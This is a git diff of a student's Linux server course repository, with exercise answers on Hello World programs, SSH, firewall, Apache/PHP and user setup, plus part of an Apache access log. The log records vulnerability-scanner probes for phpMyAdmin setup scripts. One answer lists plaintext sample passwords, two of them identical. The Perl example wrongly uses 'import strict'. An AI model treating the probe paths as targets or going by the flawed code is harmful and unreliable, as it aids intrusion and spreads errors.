grep public_html_ssh_remote': + +``` +newuser@174.138.2.190:./public_html on /home/phelenius/public_html_ssh_remote type fuse.sshfs (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000) +``` + +4. Unmount the remote folder by issuing command 'sudo umount /home/phelenius/public_html_ssh_remote'. On the client end, 'ls' command should have empty output for directory 'public_html_ssh_remote'. diff --git a/exercises/h6.md b/exercises/h6.md new file mode 100644 index 0000000..6f5dd4b --- /dev/null +++ b/exercises/h6.md @@ -0,0 +1,127 @@ +Linux servers - Exercice 6 +============== + +*Disclaimer:* +-------------- + +This exercise is a part of [Linux servers (ICT4TN021, spring 2018) // Linux-palvelimet (ICT4TN021, kevät 2018)](http://www.haaga-helia.fi/fi/opinto-opas/opintojaksokuvaukset/ICT4TN021) school course organized as a part of Information Technology studies in Haaga-Helia university of Applied Sciences, Helsinki, Finland. Course lecturer [Tero Karvinen](http://terokarvinen.com/) has defined the original assignment descriptions in Finnish presented in this document in English. Answers and translations have been written by Pekka Helenius (me, ~ Fincer). + +**a)** Write and execute "Hello world" in three code languages of your choice. Set up a necessary development environments. +-------------- + +**Answer:** + +Let's write "Hello World" in the following three languages: perl, python 3 and C. Let's install needed development tools: + +``` +sudo apt-get -y install perl python gcc +``` + +(GCC = [Gnu Compiler Collection](https://gcc.gnu.org/) + [Wikipedia](https://en.wikipedia.org/wiki/GNU_Compiler_Collection)) + +Let's write the codes into a subfolder _hello-world_ in user's home dir: + +``` +[newuser@goauldhost: ~ ]$ mkdir ~/hello-world +[newuser@goauldhost: ~ ]$ cd hello-world/ +[newuser@goauldhost: hello-world ]$ touch {hello.py,hello.pl,hello.c} +``` + +- hello.py = "Hello World" written in Python 3 + +- hello.pl = "Hello World" written in Perl + +- hello.c = "Hello World" written in C + +Hello World program written in three languages (nano editor used): + +**Perl (hello.pl):** + +``` +#!/usr/bin/env perl +# Declare runtime environment above + +# Include these to find common warnings, syntax errors etc in the code +import strict; +import warnings; + +# Print Hello World! with a newline +print "Hello World!\n"; + +``` + +**Python (hello.py):** + +``` +#!/usr/bin/env python3 +# Declare runtime environment above + +# Print Hello World! +print("Hello World!"); + +``` + +**NOTE!** Pay attention when referring to python executable. On some Linux distributions, python refers to python2, and on some, python refers to python3. Practices differ. It can be safer to use 'python3' or 'python2' instead of just 'python'. + +In a simple program like "Hello world" this python issue doesn't really matter but if any python libraries are imported into the code, you must know which python environment to use, Python 2 or Python 3. + +**C (hello.c):** + +``` +// Include Standard Input Output Library (stdio.h core library included in) +#include + +// Declare main function for the program. Int for returning a integer +int main() +{ + // Print Hello World! (stdout in CLI) + printf("Hello World!"); + + // Return boolean value "true" to the execution environment + return 0; +} +``` + +hello.c requires compiling from source code to executable binary file. Therefore, we compile the source code with the following command in _hello-world_ folder: + +``` +gcc -o hello hello.c +``` + +after which our 'binary' can be executed with + +``` +~/hello-world/hello +``` + +All programs give stdout/output string "Hello World!" in our shell environment: + +``` +[newuser@goauldhost: hello-world ]$ pwd +/home/newuser/hello-world +[newuser@goauldhost: ~ ]$ python hello.py +Hello World! +[newuser@goauldhost: ~ ]$ perl hello.pl +Hello World! +[newuser@goauldhost: ~ ]$ ./hello +Hello World! +``` + +**b)** (optional) Write a simple program for some practical purpose with each language. Ideas: utilize the key benefits of your language of choice. Take an input value from a user, generate a calculation and print the output (input-processing-layout). +-------------- + +**Answer:** + +This could have been very interesting assignment to work out. Unfortunately, my working laptop was broken so that I was not effectively able to write new code. I have worked with a perl program which generated random port and TCP/UDP sequences for knockd daemon. In addition, I have worked with some updates to Wine Configuration window (winecfg, part of Wine program) in C language: + +![winecfg-update](https://i.imgur.com/SihmPUA.jpg) + +Some Python and bash based program-related scripts and code updates are available here: + +- [PlayOnLinux patches](https://github.com/Fincer/linux-patches-and-scripts/tree/master/playonlinux). + +- Little CMake script targeted for compiling C++ code can be found [here](https://github.com/Fincer/linux-patches-and-scripts/tree/master/xclipshow) + +- Some basic scripting to convert videos with ffmpeg in KDE DE: [ffmpeg-fileconversion-video](https://github.com/Fincer/linux-patches-and-scripts/blob/master/kde-servicemenus-multimediatools/ffmpeg-fileconversion-video.sh) + +etc. diff --git a/exercises/h7.md b/exercises/h7.md new file mode 100644 index 0000000..7550407 --- /dev/null +++ b/exercises/h7.md @@ -0,0 +1,507 @@ +Linux servers - Exercice 7 +============== + +*Disclaimer:* +-------------- + +This exercise is a part of [Linux servers (ICT4TN021, spring 2018) // Linux-palvelimet (ICT4TN021, kevät 2018)](http://www.haaga-helia.fi/fi/opinto-opas/opintojaksokuvaukset/ICT4TN021) school course organized as a part of Information Technology studies in Haaga-Helia university of Applied Sciences, Helsinki, Finland. Course lecturer [Tero Karvinen](http://terokarvinen.com/) has defined the original assignment descriptions in Finnish presented in this document in English. Answers and translations have been written by Pekka Helenius (me, ~ Fincer). + +**a)** Solve a previously published final major test of this school course (You can find them with DuckDuckGo or Google). +-------------- + +**Answer:** + +Valitaan harjoitus [ict4tn021-1 alkusyksyllä 2016](http://terokarvinen.com/2016/arvioitava-laboratorioharjoitus-%e2%80%93-linux-palvelimet-ict4tn021-1-uusi-ops-alkusyksylla-2016). + +---------------------------- + +**Initial set-up for remote control of a server** + +_Prepare to control the server from abroad. Secure the server with firewall_ + +We shall install SSH server daemon to the targeted server computer. It is assumed that local or other direct access to the server command line is available since SSH server daemon is not yet installed, thus preventing direct, remote SSH control of the server. + +Once having access to the server command line, we shall test that the computer can reach the internet. Test the following commands: + +``` +ifconfig +ping www.duckduckgo.com +ip -br link show +``` + +Command explanations: + +- [ifconfig](https://www.linux.fi/wiki/Ifconfig) = Has IP address determined to a network interface on the server? + +- [ping](https://fi.wikipedia.org/wiki/Ping) = Does a site respond to ICMP requests? + +- ip = Is the network interface, which should have connection to the internet, up and active (UP)? + +When the internet connection is established, we shall proceed by installing the following packages, assuming that the server uses a Debian-based Linux distribution: openssh-server, openssh-sftp-server, openssh-client + +On some distributions, those packages can be installed simply issuing: + +``` +sudo apt-get update +sudo apt-get -y install ssh +``` + +We shall confirm that the SSH server daemon starts during the server boot-up. We shall also confirm that the SSH server daemon is up and running and its status is 'active': + +``` +sudo systemctl enable ssh.service +systemctl status ssh.service +``` + +**NOTE!** Alternative commands can also be used, like: + +``` +sudo systemctl enable sshd +systemctl is-active sshd +``` + +etc. + +Has our firewall program installed on the system? + +``` +which ufw +which iptables +``` + +If both of those executable files ('ufw' and 'iptables') are found on the system, we shall accept network traffic to port 22, protocol TCP (INPUT 22/TCP). Let's apply these rules to our firewall: + +``` +sudo ufw allow 22/tcp +``` + +Make sure our firewall program 'ufw' (Uncomplicated Firewall) is enabled and turned on: + +``` +sudo ufw enable +sudo systemctl enable ufw.service +``` + +**NOTE!** By default, Linux firewall blocks all input traffic. Therefore, SSH input traffic must separately be allowed like described above. + +---------------------------- + +**Security set-up for a company** + +_Install remotely working security tools for our company. (In this assignment, you can assume that installing a package or packages from our repository is secure)_ + +The following commands have been pre-determined in the assignment: + +- download .deb installer file with 'wget' command + +- install the downloaded .deb package with command 'sudo dpkg -i' which extract a new repository file 'terorep.list' into '/etc/apt/sources.list.d/') + +- update package databases with command 'sudo apt-get update' + +- install package 'terowatch' which is made available by the new repository. The package is available for Ubuntu distribution, version 16.04 LTS. The repository file itself contains string 'deb http://terokarvinen.com/qrs/terorep/ precise main' + +**NOTE!** 'terowatch' package uses network interface 'eth0' by default. However, we haven't defined such interface in our system configuration (this can be fixed by adding 'net.ifnames=0' in udev rules/kernel boot parameters in syslinux or grub). Instead, we use network interface 'enp4s0'. + +Proper fix to this issue would be patching the code and applying the patch into the deb package. Another solution would be making the proper fix directly to the source code. In this assignment, we directly modify the executable file, written in Python. This method is not recommended but for the extent of this assignment, it is sufficient solution to proceed. + +``` +dpkg -L terowatch +sudo sed -i 's/eth0/enp4s0/g' /usr/bin/qrsc +``` + +Command _terowatch_ gives desired text output “TeroWatch is installed” (the string is defined in shell executable '/usr/bin/terowatch') + +---------------------------- + +**Statistics** + +_Collect workload statistics of various system resources (CPU, RAM) while doing the assignment. The data collection must be started before proceeding in the assignment. Write a short analysis of the collected statistics after you've finished other parts of the assignment._ + +We shall install 'sysstat': + +``` +sudo apt-get update && sudo apt-get -y install sysstat +``` + +Let's run 'sar' command in 2 second interval for undefined time period. Print output of the command to file '$HOME/sysstat.file' + +``` +sar 2 -o $HOME/sysstat.file +``` + +The file can be analyzed afterwards with 'sar' command in the end of the assignment. + +![sysstat_cpu-mem](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/sar_stats_cpu-ram.png) + +Short analysis, based on the picture above: + +- CPU (command: 'sar 10 -f $HOME/sysstat.file'): CPU has been in moderate workload. User processes have not depleted resources that much, in contrast to system processes which stress the CPU many times more. 'iowait' value tells us that the processor has waited for mass memory device. During the data collection, some data was transferred from a hard disk to another. CPU capacity limits were not reached. + +- Mem/RAM (command: 'sar -r 10 -f $HOME/sysstat.file'): Memory consumption has been significant during the data collection period ('%memused' and '%commit'). The system has 4GB DDR3 memory of which majority has been in use. Amount of free memory has been 100MB. Two main operations have affected the memory usage level: web browser usage and file transfer/copy operations which were performed during the data collection period. Active memory was used 2,5GB on average, passive (inactive) memory usage was 700MB. Amount of memory which has waited for to be written varies between 5MB-200MB ('kbdirty'). + +---------------------------- + +**PHP from remote countries** + +_Install us necessary tools for remote PHP website development._ + +- SSH server daemon has already been installed, port 22 is opened -> OK + +- We shall install HTTP daemon (Apache web server) and open the default port 80 for it in our firewall. Additionally, we shall install necessary PHP (7.0) packages: + +``` +sudo apt-get update && sudo apt-get -y install apache2 php7.0 libapache2-mod-php7.0 && sudo ufw allow 80/tcp +``` + +Let's enable Apache server daemon, check the status of it (must be 'active') and tell the system that Apache should automatically be started during the server boot-up: + +``` +systemctl status apache2.service +sudo systemctl enable apache2.service +``` + +Let's check that the port 80 is opened in our firewall: + +``` +xubuntu@xubuntu:/home$ sudo ufw status +Status: active + +To Action From +-- ------ ---- +22/tcp ALLOW Anywhere +80/tcp ALLOW Anywhere +22/tcp (v6) ALLOW Anywhere (v6) +80/tcp (v6) ALLOW Anywhere (v6) +``` + +(you don't need to execute command 'sudo systemctl start apache2.service' after the Apache installation because the Apache web server daemon is automatically enabled during the server boot-up by default. This information can be found with command 'systemctl status apache2.service') + +We shall enable Apache's PHP module while using module 'userdir'. This can be done by commenting the lines between tags in file '/etc/apache2/mods-available/php7.0.conf'. Right after we should enable Apache's 'userdir' module and restart the Apache web server: + +``` +sudo a2enmod userdir +sudo systemctl restart apache2.service +``` + +Let's check that Apache web server is still up and running by issuing command 'systemctl status apache2.service'. Let's check that we can access our default localhost website (IP address 127.0.0.1) which indicates whether the Apache server works as intended: + +``` +xdg-open http://localhost +``` + +'xdg-open' command definition: + +``` +[12/03/2018 22:31:11 - fincer: ~ ]$ whatis xdg-open +xdg-open (1) - opens a file or URL in the user's preferred application +``` + +We must check that we can access our website from a remote network. In a test laboratory, this test would be done checking output of command 'ifconfig', looking for a relevant IP address and login to the server from another computer using the grabbed IP address and SSH client program (command syntax using default SSH port 22 would be: 'ssh server-user@server-ip'). In order to access the server from a remote network, the relevant IP address for connecting the server must be known, and confirmation for succeeded remote access must exist. Any router & NAT/PAT configurations between a client and the server must work. + +_Our users are as follows: Maija Mehilälinen, Peter Ö, Oskar Jäärä, John Do, Verner Vrij, Mikko Möttönen, Jalmari Ähkä, Håkan Swarz and Maija Maitoparta. Create a sample website for each user with PHP._ + +_List all user accounts and passwords in file lab.txt (“/home/*/lab.txt”). Protect the file so that other users can not read it._ + +We shall generate all required passwords (9 for users + admin) with 'pwgen'. Password length is 20 characters, randomized, at least one uppercase character included and secure parameter for the command is used: + +``` +sudo apt-get update && sudo apt-get install pwgen +pwgen 20 10 -sc1 +``` + +We shall store additional admin password into a separate, secure place (of your choice). Admin account (or user) username is 'admin'. + +We haven't created admin user 'admin' yet. Let's do it. We shall also grant 'sudo' group permissions to this new administration user: + +``` +sudo adduser admin +sudo usermod -aG sudo admin +su admin +``` + +The last command 'su admin' switched our shell view to the user's 'admin' shell. We should lock the server root account by issuing command 'sudo usermod --lock root' (which adds an exclamation mark right before root's password in file '/etc/shadow'). We could increase system's overall security by blocking usage of various TTY sessions (commenting out lines in file '/etc/securetty') and by adding more restrictions to the system's PAM policy. + +For securing our SSH connections, we shall add the following line in '/etc/ssh/sshd_config' file (use 'sudoedit' or 'sudo nano' command): + +``` +PermitRootLogin no +``` + +After having altered '/etc/ssh/sshd_config', restart SSH server daemon by issuing command + +``` +sudo systemctl restart sshd +``` + +Create file $HOME/lab.txt (where $HOME=/home/admin) with the following contents: + +``` +mmehilal RWjM8r2fyq8gQq3wnzq0 # Maija Mehilälinen +po a5B60cmTyrwPLS2mJ9uQ # Peter Ö +ojaara P1KkLl0XaV5JpqntxdJG # Oskar Jäärä +jdo ZgMb5TrU4Ee3bT48eCff # John Do +vvrij RWjM8r2fyq8gQq3wnzq0 # Verner Vrij +mmottone GpuyZqp2pGsmPINJPO1h # Mikko Möttönen +jahka nFTellIyRjwiC0YKtPwq # Jalmari Ähkä +hswarz u5qfJCC2jZMGQPWwPZLV # Håkan Swarz +mmaitopa OCeBmKYWWgFIXubdFc6j # Maija Maitoparta +``` + +Restrict permissions for this file by issuing the following command (as user 'admin'): + +``` +chmod og-rwx,u-x $HOME/lab.txt +``` + +Output: + +``` +admin@xubuntu:~$ ls -l lab.txt +-rw------- 1 admin admin 407 Mar 12 11:42 lab.txt +``` + +Let's create a generic, pretty simple PHP file 'index.php' into the home directory of the user 'admin', and as the user 'admin'. + +``` +nano /home/admin/index.php +``` + +Add the following contents: + +``` + +``` + +**NOTE!** Make sure you have enabled php & userdir modules on Apache at this point! + +After that, we shall copy the PHP file for each user into a user-specific subdirectory 'public_html' ('/home/*/public_html'). + +The user-specific directory 'public_html' and contents of it should have correct permissions set up for each user. + +On Debian-based Linux distributions, a perl script '[adduser](https://alioth.debian.org/plugins/scmgit/cgi-bin/gitweb.cgi?p=adduser/adduser.git;a=tree)' is provided for creating new users. Let's do the following: + +- 1) Create required user accounts with the generated passwords + +- 2) Copy the pre-created index.php file into each user's $HOME/public_html folder + +- 3) For each user, test that their index.php is showing expected and correct output + +Run the following with any system user who belongs to the 'sudo' group: + +``` +sudo apt-get update && sudo apt-get -y install curl && \ +for user in mmehilal po ojaara jdo vvrij mmottone jahka hswarz mmaitopa; do echo -e "User is: $user\n" && sudo adduser $user && sudo mkdir -p /home/$user/public_html/ && sudo cp /home/admin/index.php /home/$user/public_html/ && sudo chown -R $user:$user /home/$user && [[ $(curl -s http://localhost/~${user}/index.php | grep -i "404 not found" | wc -l) -ne 0 ]] && echo -e "\nPHP test site not found for '${user}'\n" || echo -e "\nPHP test site is OK for user\n"; done +``` + +**NOTE!** To test site on a graphical web browser, you need to keep in mind that user 'xubuntu' is the only user having access to graphical display on X server right now (see '.Xauthority' and environment variable DISPLAY for details). Thus, the following commands should be used in our current setup: + +``` +sudo passwd xubuntu +su xubuntu +for user in mmehilal po ojaara jdo vvrij mmottone jahka hswarz mmaitopa; do xdg-open http://localhost/~${user}; done +``` + +**NOTE!** We can exit the shell view of the user 'admin' simply issuing command 'exit' on that shell view. + +**NOTE!** Consider the following in a production environment, instead of doing nasty things with administration users: + +- You can (but don't have to) modify the current user, grant administration rights, modify username, home directory and groups ('usermod' command) instead of adding a separate account for an administrator + +- You can create a new main/admin user and remove an old one (in our case, we should delete 'xubuntu' account). You can delete users with command 'userdel'. + +- You can have clearly restricted and well named groups to separate users with various permissions on a system. Apply your user and group policy so that specific users belong to the right groups. + +- Check usage of various environment variables in your shell view + +Screenshot of user-specific PHP sites on the configured server environment: + +![apache-php-multiple](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/apache_phpinfo_multiple.png) + +Checking permissions for each index.php files & public_html directories: + +``` +for user in mmehilal po ojaara jdo vvrij mmottone jahka hswarz mmaitopa; do ls -lR /home/$user | sed '/total [0-9]/d'; done +``` + +Output: + +``` +/home/mmehilal: +drwxr-xr-x 2 mmehilal mmehilal 60 Mar 12 11:50 public_html + +/home/mmehilal/public_html: +-rw-r--r-- 1 mmehilal mmehilal 20 Mar 12 12:00 index.php +/home/po: +drwxr-xr-x 2 po po 60 Mar 12 12:00 public_html + +/home/po/public_html: +-rw-r--r-- 1 po po 20 Mar 12 12:00 index.php +/home/ojaara: +drwxr-xr-x 2 ojaara ojaara 60 Mar 12 12:01 public_html + +/home/ojaara/public_html: +-rw-r--r-- 1 ojaara ojaara 20 Mar 12 12:01 index.php +/home/jdo: +drwxr-xr-x 2 jdo jdo 60 Mar 12 12:01 public_html + +/home/jdo/public_html: +-rw-r--r-- 1 jdo jdo 20 Mar 12 12:01 index.php +/home/vvrij: +drwxr-xr-x 2 vvrij vvrij 60 Mar 12 12:01 public_html + +/home/vvrij/public_html: +-rw-r--r-- 1 vvrij vvrij 20 Mar 12 12:01 index.php +/home/mmottone: +drwxr-xr-x 2 mmottone mmottone 60 Mar 12 12:01 public_html + +/home/mmottone/public_html: +-rw-r--r-- 1 mmottone mmottone 20 Mar 12 12:01 index.php +/home/jahka: +drwxr-xr-x 2 jahka jahka 60 Mar 12 12:02 public_html + +/home/jahka/public_html: +-rw-r--r-- 1 jahka jahka 20 Mar 12 12:02 index.php +/home/hswarz: +drwxr-xr-x 2 hswarz hswarz 60 Mar 12 12:02 public_html + +/home/hswarz/public_html: +-rw-r--r-- 1 hswarz hswarz 20 Mar 12 12:02 index.php +/home/mmaitopa: +drwxr-xr-x 2 mmaitopa mmaitopa 60 Mar 12 12:02 public_html + +/home/mmaitopa/public_html: +-rw-r--r-- 1 mmaitopa mmaitopa 20 Mar 12 12:02 index.php +``` + +---------------------------- + +**iot12tools** + +_Install and configure metapackage 'iot12tools' for us. The metapackage should install the following development tools for 'Internet of Things': arduino IDE, gedit (text editor), gedit-plugins, curl (CLI browser) and Python 3 programming language._ + +Run the following commands as the user 'admin': + +``` +sudo apt-get update && sudo apt-get -y install equivs +mkdir ~/iot12tools +cd ~/iot12tools +equivs-control iot12tools +``` + +Edit contents of file 'io12tools' to look like the following: + +``` +### Commented entries have reasonable defaults. +### Uncomment to edit them. +Section: misc +Priority: optional +Standards-Version: 3.9.2 + +Package: iot12tools +Version: 0.1 +Maintainer: Pekka Helenius +Depends: arduino, gedit, gedit-plugins, curl, python3 +Architecture: all +Description: A meta package which provides basic IoT development tools + Installs Gedit text editor, Gedit plugins, Arduino IDE and Python 3 + +``` + +Run the following command in directory '~/iot12tools': + +``` +equivs-build iot12tools +``` + +Install the generated metapackage (which installs required packages for us): + +``` +sudo apt install -f ./iot12tools_0.1_all.deb +``` + +---------------------------- + +**Hello Python 3** + +_Jalmari want to develop in Python 3. Create a simple Python 3 file in his home root directory. The file should print output 'Hello World'._ + +Install necessary python3 packages as the user 'admin': + +``` +sudo apt-get update && sudo apt-get install -y python3 +``` + +Switch your shell view to user 'jahka' (Jalmari Ähkä) and go to his home directory: + +``` +su jahka +cd +``` + +**NOTE!** We can make sure that we are in his home directory ('/home/jahka') by issuing command 'pwd'. + +Let's create a new file '~/helloworld.py' with the following contents: + +``` +#!/usr/bin/env python3 + +print("Hello World"); + +``` + +Modify file permissions, grant executable permission for the user 'jahka', remove from others (including the group who owns the file): + +``` +chmod u+x,og-x helloworld.py +``` + +The file permissions are now: + +``` +-rwxrw-r-- 1 jahka jahka 47 Mar 12 12:59 helloworld.py +``` + +Test the code: + +``` +jahka@xubuntu:~$ python3 ~/helloworld.py +Hello World + +``` + +The output is as desired, 'Hello World', indicating that we have successfully installed Python3 development environment for the required user. + +**c)** (optional) Use Linux outside the course scope. +-------------- + +**Answer:** + +The following pictures demonstrate [Arch Linux ARM](https://archlinuxarm.org/platforms/armv6/raspberry-pi) running on my Raspberry Pi 1 Model B. The solution is quite rushed but it works technically: + +![rpi1b_archlinux-1](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/8621414351d107b0960b9f6714f539981364b035/rpi1b_archlinux_1.jpg) + +![rpi1b_archlinux-2](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/8621414351d107b0960b9f6714f539981364b035/rpi1b_archlinux_2.jpg) + +- Display: [Lilliput 869GL](http://www.lilliputuk.com/monitors/hdmi/869gl/) + +- SDHC card: Transcend 16GB + +- HDD: 750GB in [Icy Box IB-3640SU3](http://www.raidsonic.de/products/external_cases/external_cases_35/index_en.php?we_objectID=480) hard disk external case. + +- Desktop environment: LxQt + +About my Linux usage: + +My first touch to Linux world was back in early spring, 2011. The first Linux distribution I installed was Ubuntu 10.04 LTS, and after that I have tried out many distributions, including Linux Mint, Fedora, OpenSUSE and Arch Linux. + +The first computer I ever had a Linux installation was [Asus Eee PC 1215N](https://www.asus.com/Laptops/Eee_PC_1215N/) mini laptop. My primary operating system on that laptop was [EasyPeasy](https://sourceforge.net/projects/ubuntu-eee/), a variant of Ubuntu 10.04 LTS which uses Gnome 2 desktop environment and additional customization package 'ubuntu-netbook-launcher' (known as [Linux Netbook Remix](https://en.wikipedia.org/wiki/Ubuntu_Netbook_Edition)), predecessor of Canonical's Unity desktop. + +After the Asus Eee PC 1215N broke, I moved to [Asus N56JR laptop](https://www.asus.com/Laptops/N56JR/) for which I installed Linux Mint with Cinnamon desktop environment at first. Soon after I moved to Arch Linux where I used Cinnamon desktop for a short while, as well. I moved quickly from Cinnamon to KDE desktop because I Cinnamon desktop had mysterious and unacceptable freeze events on my personal use. + +Why did I choose KDE desktop over multiple alternatives, such as XFCE, LXDE, Mate, Gnome 3, Budgie, Pantheon or LxQt? I consider several things when choosing a desktop environment: stability, long-term development history, suitability for efficient multitasking and configuration possibilities (source code + GUI + conf files). I have been happy Arch Linux + KDE desktop user for many years - and I still am. Of course, I have tested various other desktop environments but always returned to KDE. + +In general, I have multiple Linux distributions, MS Windows 7 and Android on Virtual Machines for various purposes. + +More or less, I have participated in various open source project and done Windows software testing on Wine. I like to create scripts for daily usage, mainly to automate routine-like, boring tasks and processes. One of my key interests have been in digital image processing and raw image analysis, for which both Linux suits very well, offering a solid, adaptable and cost-effective platform. I set up my first LAMP server several years back from now on my Raspberry Pi 1 Model B. diff --git a/exercises/h_all.md b/exercises/h_all.md new file mode 100644 index 0000000..04a029e --- /dev/null +++ b/exercises/h_all.md @@ -0,0 +1,24 @@ +*Disclaimer:* +-------------- + +These exercises are a part of [Linux servers (ICT4TN021, spring 2018) // Linux-palvelimet (ICT4TN021, kevät 2018)](http://www.haaga-helia.fi/fi/opinto-opas/opintojaksokuvaukset/ICT4TN021) school course organized as a part of Information Technology studies in Haaga-Helia university of Applied Sciences, Helsinki, Finland. Course lecturer [Tero Karvinen](http://terokarvinen.com/) has defined the original assignment descriptions in Finnish presented in these exercises in English. Answers and translations have been written by Pekka Helenius (me, ~ Fincer). + +**NOTE**: These instructions rely on Linux Ubuntu 16.04 LTS which has PHP version 7.0. + +- [Exercise 1](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/h1.md) + +- [Exercise 2](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/h2.md) + +- [Exercise 3](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/h3.md) + +- [Exercise 4](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/h4.md) + +- [Exercise 5](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/h5.md) + +- [Exercise 6](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/h6.md) + +- [Exercise 7](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/h7.md) + +It's just the beginning... + +![tuxracer](https://appworld.blackberry.com/webstore/servedimages/430256.png/?t=17) diff --git a/images/apache_phpinfo_multiple.png b/images/apache_phpinfo_multiple.png new file mode 100644 index 0000000..86b3578 Binary files /dev/null and b/images/apache_phpinfo_multiple.png differ diff --git a/images/apina-site.png b/images/apina-site.png new file mode 100644 index 0000000..4a7ad90 Binary files /dev/null and b/images/apina-site.png differ diff --git a/images/bmicalc-sample.png b/images/bmicalc-sample.png new file mode 100644 index 0000000..6b24c60 Binary files /dev/null and b/images/bmicalc-sample.png differ diff --git a/images/empty-page-sample.png b/images/empty-page-sample.png new file mode 100644 index 0000000..d06f602 Binary files /dev/null and b/images/empty-page-sample.png differ diff --git a/images/h2-exiftool.png b/images/h2-exiftool.png new file mode 100644 index 0000000..79ad7bd Binary files /dev/null and b/images/h2-exiftool.png differ diff --git a/images/h2-fakeroot.png b/images/h2-fakeroot.png new file mode 100644 index 0000000..f50c136 Binary files /dev/null and b/images/h2-fakeroot.png differ diff --git a/images/h2-lynx.png b/images/h2-lynx.png new file mode 100644 index 0000000..3d5e5c6 Binary files /dev/null and b/images/h2-lynx.png differ diff --git a/images/pekkahh-website.png b/images/pekkahh-website.png new file mode 100644 index 0000000..b77aa8d Binary files /dev/null and b/images/pekkahh-website.png differ diff --git a/images/php-example-rainfall.png b/images/php-example-rainfall.png new file mode 100644 index 0000000..1c72d27 Binary files /dev/null and b/images/php-example-rainfall.png differ diff --git a/images/phpmyadmin-2-resized.png b/images/phpmyadmin-2-resized.png new file mode 100644 index 0000000..481b6e7 Binary files /dev/null and b/images/phpmyadmin-2-resized.png differ diff --git a/images/phpmyadmin-resized.png b/images/phpmyadmin-resized.png new file mode 100644 index 0000000..0501e56 Binary files /dev/null and b/images/phpmyadmin-resized.png differ diff --git a/images/rpi1b_archlinux_1.jpg b/images/rpi1b_archlinux_1.jpg new file mode 100644 index 0000000..d2d5ced Binary files /dev/null and b/images/rpi1b_archlinux_1.jpg differ diff --git a/images/rpi1b_archlinux_2.jpg b/images/rpi1b_archlinux_2.jpg new file mode 100644 index 0000000..8675694 Binary files /dev/null and b/images/rpi1b_archlinux_2.jpg differ diff --git a/images/sar-iostats.png b/images/sar-iostats.png new file mode 100644 index 0000000..8805b59 Binary files /dev/null and b/images/sar-iostats.png differ diff --git a/images/sar-stats_ipv4.png b/images/sar-stats_ipv4.png new file mode 100644 index 0000000..2b279a4 Binary files /dev/null and b/images/sar-stats_ipv4.png differ diff --git a/images/sar-stats_memusage.png b/images/sar-stats_memusage.png new file mode 100644 index 0000000..31049b3 Binary files /dev/null and b/images/sar-stats_memusage.png differ diff --git a/images/sar_stats_cpu-ram.png b/images/sar_stats_cpu-ram.png new file mode 100644 index 0000000..4eafa18 Binary files /dev/null and b/images/sar_stats_cpu-ram.png differ diff --git a/images/workprice-site_example.png b/images/workprice-site_example.png new file mode 100644 index 0000000..fa84694 Binary files /dev/null and b/images/workprice-site_example.png differ diff --git a/other/apache-log-sample b/other/apache-log-sample new file mode 100644 index 0000000..fe8f1bb --- /dev/null +++ b/other/apache-log-sample @@ -0,0 +1,2274 @@ +123.125.71.77 - - [26/Oct/2014:07:06:02 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.185 - - [26/Oct/2014:07:07:03 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.185 - - [26/Oct/2014:08:20:17 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.97 - - [26/Oct/2014:08:20:41 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.149 - - [26/Oct/2014:09:18:10 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.82 - - [26/Oct/2014:09:20:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.107 - - [26/Oct/2014:10:26:42 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.141 - - [26/Oct/2014:10:27:17 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.70 - - [26/Oct/2014:11:01:51 +0200] "GET /ftp/public/pictures/gallery/ahvenkoski_panoraama_small.jpg HTTP/1.1" 200 101390 "http://image.baidu.com/i?ct=503316480&z=0&tn=baiduimagedetail" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)" +123.125.71.98 - - [26/Oct/2014:11:16:59 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +88.193.104.98 - - [26/Oct/2014:11:21:04 +0200] "GET /ftp/public/pictures/gallery/merry_christmas_2013_small.jpg HTTP/1.1" 200 137146 "https://www.google.fi/" "Mozilla/5.0 (iPad; CPU OS 6_1_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B147 Safari/8536.25" +213.136.82.53 - - [26/Oct/2014:12:07:19 +0200] "GET /yaya/yay/ya.php HTTP/1.1" 404 416 "-" "-" +213.136.82.53 - - [26/Oct/2014:12:07:19 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +213.136.82.53 - - [26/Oct/2014:12:07:19 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +213.136.82.53 - - [26/Oct/2014:12:07:19 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.98 - - 